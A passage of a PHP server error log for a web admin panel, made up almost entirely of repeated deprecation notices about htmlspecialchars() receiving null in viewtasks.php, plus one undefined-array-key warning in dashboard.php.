Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is 